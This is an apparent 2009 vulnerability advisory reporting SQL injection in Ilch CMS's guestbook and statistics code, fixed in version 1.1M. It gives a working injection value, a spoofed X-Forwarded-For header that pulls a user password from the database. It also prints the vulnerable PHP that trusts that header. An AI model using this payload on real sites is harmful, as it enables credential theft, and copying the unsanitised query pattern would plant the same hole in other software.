Vulnerable: Ilch CMS

Type securityvulns
Reporter Securityvulns
Modified 2009-02-07T00:00:00


Ilch CMS (from is vulnerable to sql-injection

Prone to the vulnerabilty are the guestbook and the statistics.

  • Affected Versions: ilch 1.1L and below
  • Not vulnerable: ilch 1.1M

  • Exploit: Spoof your x-forwarded-for header to:', (select `pass` from prefix_user WHERE `id` > 0

    ORDER BY `id` LIMIT 1)) /*

        Then create a guestbook entry.
  • Timeline: 3.Feb.09: Vuln reported to 3.Feb.09: Got reply from ilch 4.Feb.09: Version 1.1M is available which fixes the issue

Here is a summary of the vulnerability:

in include/includes/func/statistics.php is missing user input


function getip() { if ($_SERVER["HTTP_X_FORWARDED_FOR"]) { return ($_SERVER["HTTP_X_FORWARDED_FOR"]); } else { return ($_SERVER["REMOTE_ADDR"]); } }

in include/contents/gbook.php getip() is used without validation

db_query("INSERT INTO prefix_gbook
(`name`,`mail`,`page`,`time`,`ip`,`txt`) VALUES ('".$name."', '".$mail."',
'".$page."', '".time()."', '".getip()."', '".$txt."')");

There is also getip() used in includes/func/user.php, but its way harder

to exploit:

db_query("INSERT INTO prefix_online (sid,uptime,ipa) VALUES

Please credit the discovery to Gizmore from :)

Kind Regards Gizmore